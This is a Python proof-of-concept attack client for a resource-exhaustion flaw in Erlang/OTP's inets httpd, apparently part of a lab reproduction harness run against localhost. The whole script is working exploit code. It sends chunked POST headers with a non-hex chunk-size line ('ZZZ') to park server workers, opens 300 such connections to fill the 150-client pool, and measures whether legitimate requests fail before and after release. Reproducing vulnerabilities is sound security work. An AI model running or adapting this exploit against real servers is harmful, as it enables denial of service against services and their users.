#!/usr/bin/env python3
"""Attack client for CVE-2026-69664 (Erlang/OTP inets httpd worker parking).

Drives the real httpd listener through raw TCP sockets:
  - healthcheck GET (Connection: close)
  - single parked chunked POST: headers in one TCP write, then (after a
    short delay, guaranteeing a separate TCP segment) a non-hex chunk-size
    line 'ZZZ\r\n'; the socket is then held open with no further bytes.
  - census sampling from the server-side census.log
  - exhaustion wave of parked connections to exceed max_clients (default 150);
    when --expect-pool-full is given, the client polls the server-side census
    until the pool is actually observed full (>= max_clients parked handlers)
    before issuing the post-exhaustion legitimate request, removing the race
    where the legit probe fires while the accept backlog is still draining.
  - post-exhaustion legit requests and recovery checks

Sockets are kept open purely by holding references (no shutdown/close)
until the final phase. Writes a result JSON to the given output path.
"""
import argparse
import json
import socket
import sys
import threading
import time
import os

HEADERS = (
    b"POST /index.html HTTP/1.1\r\n"
    b"Host: vulntest\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
)
BAD_CHUNK_SIZE = b"ZZZ\r\n"


def recv_response(sock, timeout=5.0, maxbytes=4096):
    """Read whatever the server sends until close/timeout."""
    sock.settimeout(timeout)
    chunks = []
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                return b"".join(chunks), "closed"
            chunks.append(data)
            if sum(len(c) for c in chunks) >= maxbytes:
                return b"".join(chunks), "maxbytes"
    except socket.timeout:
        return b"".join(chunks), "timeout"
    except ConnectionResetError as e:
        return b"".join(chunks), "reset:%s" % e


def legit_get(port, timeout=5.0):
    s = socket.create_connection(("127.0.0.1", port), timeout=timeout)
    try:
        s.sendall(b"GET /index.html HTTP/1.1\r\nHost: vulntest\r\nConnection: close\r\n\r\n")
        buf, status = recv_response(s, timeout=timeout)
        return {"status": status, "response": buf.decode("latin-1", "replace")}
    finally:
        s.close()


def park_one(port, results, idx, delay=0.3):
    """Open one connection; TCP write #1 = headers, TCP write #2 = invalid
    chunk-size line; then hold the socket open with no further bytes (the
    socket object stays referenced in `results`, so it is never closed)."""
    try:
        s = socket.create_connection(("127.0.0.1", port), timeout=5)
        s.sendall(HEADERS)           # TCP write #1: headers only
        time.sleep(delay)            # guarantees a separate TCP segment
        s.sendall(BAD_CHUNK_SIZE)    # TCP write #2: invalid chunk-size line
        results[idx] = {"sock": s, "error": None}
    except Exception as e:  # noqa
        results[idx] = {"sock": None, "error": str(e)}


def parse_census(path):
    entries = []
    with open(path, "r", errors="replace") as f:
        for line in f:
            line = line.strip()
            if line.startswith("CENSUS"):
                parts = line.split()
                ts, count = int(parts[1]), int(parts[2])
                pids = parts[3] if len(parts) > 3 else ""
                entries.append({"ts": ts, "count": count, "detail": pids})
    return entries


def wait_for_port(workdir, timeout=30):
    deadline = time.time() + timeout
    while time.time() < deadline:
        p = os.path.join(workdir, "port.txt")
        if os.path.exists(p):
            try:
                return int(open(p).read().strip())
            except ValueError:
                pass
        time.sleep(0.2)
    raise RuntimeError("server never wrote port.txt")


def wait_pool_full(workdir, want=150, timeout=45.0, poll=0.5):
    """Poll the server-side census until `want` request handlers are alive
    (the vulnerable worker pool is full) or `timeout` elapses. Returns
    (pool_full, latest_census_entry, waited_seconds)."""
    start = time.time()
    deadline = start + timeout
    last = None
    while time.time() < deadline:
        entries = parse_census(os.path.join(workdir, "census.log"))
        last = entries[-1] if entries else None
        if last and last["count"] >= want:
            return True, last, round(time.time() - start, 1)
        time.sleep(poll)
    return False, last, round(time.time() - start, 1)


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--workdir", required=True)
    ap.add_argument("--out", required=True)
    ap.add_argument("--role", required=True)
    ap.add_argument("--observe-seconds", type=int, default=165,
                    help="how long to keep the single parked connection under observation")
    ap.add_argument("--exhaust-connections", type=int, default=300)
    ap.add_argument("--exhaust-recheck-seconds", type=int, default=25)
    ap.add_argument("--expect-pool-full", action="store_true",
                    help="poll the census until the worker pool is observed full "
                         "(>= 150 parked handlers) before the post-exhaustion legit probe")
    args = ap.parse_args()

    workdir = os.path.abspath(args.workdir)
    port = wait_for_port(workdir)
    result = {"role": args.role, "port": port, "phases": {}}

    # Phase 1: healthcheck
    hc = legit_get(port)
    result["phases"]["healthcheck"] = hc
    print("[healthcheck] status=%s first-line=%r" % (hc["status"], (hc["response"] or "").split("\r\n")[0]))

    # Phase 2: single parked connection
    res = {}
    t = threading.Thread(target=park_one, args=(port, res, 0), daemon=True)
    t.start()
    t.join()
    if res[0]["error"]:
        result["phases"]["park"] = {"error": res[0]["error"]}
        json.dump(result, open(args.out, "w"), indent=2)
        sys.exit(1)
    parked_sock = res[0]["sock"]

    # Legit request right after parking (server still serves other clients)
    mid = legit_get(port)
    result["phases"]["midpark_legit"] = mid
    print("[midpark_legit] status=%s first-line=%r" % (mid["status"], (mid["response"] or "").split("\r\n")[0]))

    samples = []
    start = time.time()
    check_times = sorted(set([3, 45, 95, max(3, args.observe_seconds - 3)]))
    observe_until = start + args.observe_seconds
    while time.time() < observe_until:
        now = time.time() - start
        fired = False
        for ct in list(check_times):
            if now >= ct:
                entries = parse_census(os.path.join(workdir, "census.log"))
                latest = entries[-1] if entries else None
                samples.append({"t": round(ct, 1), "census": latest})
                print("[census t=%s] handlers=%s detail=%s" %
                      (ct, latest and latest["count"], (latest and latest["detail"] or "")[:120]))
                check_times.remove(ct)
                fired = True
                break
        if not fired:
            time.sleep(0.5)
    # what did the server send to the parked socket?
    parked_recv, parked_status = recv_response(parked_sock, timeout=0.2)
    result["phases"]["park"] = {
        "observation_seconds": args.observe_seconds,
        "census_samples": samples,
        "parked_socket_recv": parked_recv.decode("latin-1", "replace"),
        "parked_socket_status": parked_status,
    }
    print("[park] after %ss observation: socket status=%s recv=%r" %
          (args.observe_seconds, parked_status, parked_recv[:80]))

    # Phase 3: exhaustion wave (more parked connections than max_clients default 150)
    results2 = {}
    threads = []
    n = args.exhaust_connections
    for i in range(n):
        th = threading.Thread(target=park_one, args=(port, results2, i), daemon=True)
        th.start()
        threads.append(th)
    for th in threads:
        th.join()
    ok = sum(1 for r in results2.values() if r["error"] is None)
    errors = [r["error"] for r in results2.values() if r["error"]]
    if args.expect_pool_full:
        # deterministic: wait until the server-side census shows the pool full
        pool_full, pool_census, pool_wait = wait_pool_full(workdir, want=150, timeout=45.0)
        time.sleep(1.0)
    else:
        pool_full, pool_census, pool_wait = None, None, 2.0
        time.sleep(2.0)
    exhausted_legit = legit_get(port, timeout=6)
    result["phases"]["exhaustion"] = {
        "attack_connections": n,
        "parked_ok": ok,
        "parked_errors": errors[:5],
        "pool_full": pool_full,
        "pool_full_census": pool_census,
        "pool_wait_seconds": pool_wait,
        "legit_after_exhaustion": exhausted_legit,
    }
    print("[exhaustion] parked=%d/%d; pool_full=%s (census=%s after %ss); legit status=%s first-line=%r" %
          (ok, n, pool_full, pool_census and pool_census["count"], pool_wait,
           exhausted_legit["status"],
           (exhausted_legit["response"] or "").split("\r\n")[0]))

    # Phase 4: no recovery after waiting
    time.sleep(args.exhaust_recheck_seconds)
    recheck = legit_get(port, timeout=6)
    result["phases"]["exhausted_recheck"] = recheck
    entries = parse_census(os.path.join(workdir, "census.log"))
    result["phases"]["exhausted_census"] = entries[-1] if entries else None
    print("[recheck after %ss] legit status=%s first-line=%r census=%s" %
          (args.exhaust_recheck_seconds, recheck["status"],
           (recheck["response"] or "").split("\r\n")[0],
           entries[-1]["count"] if entries else None))

    # Phase 5: attacker disconnects -> workers reclaimed -> server recovers
    for r in results2.values():
        if r["sock"]:
            try:
                r["sock"].close()
            except OSError:
                pass
    try:
        parked_sock.close()
    except OSError:
        pass
    time.sleep(3.0)
    recovered = legit_get(port, timeout=8)
    result["phases"]["after_close_legit"] = recovered
    entries = parse_census(os.path.join(workdir, "census.log"))
    result["phases"]["after_close_census"] = entries[-1] if entries else None
    print("[after-close] legit status=%s first-line=%r census=%s" %
          (recovered["status"],
           (recovered["response"] or "").split("\r\n")[0],
           entries[-1]["count"] if entries else None))

    json.dump(result, open(args.out, "w"), indent=2)
    print("[done] wrote %s" % args.out)


if __name__ == "__main__":
    main()
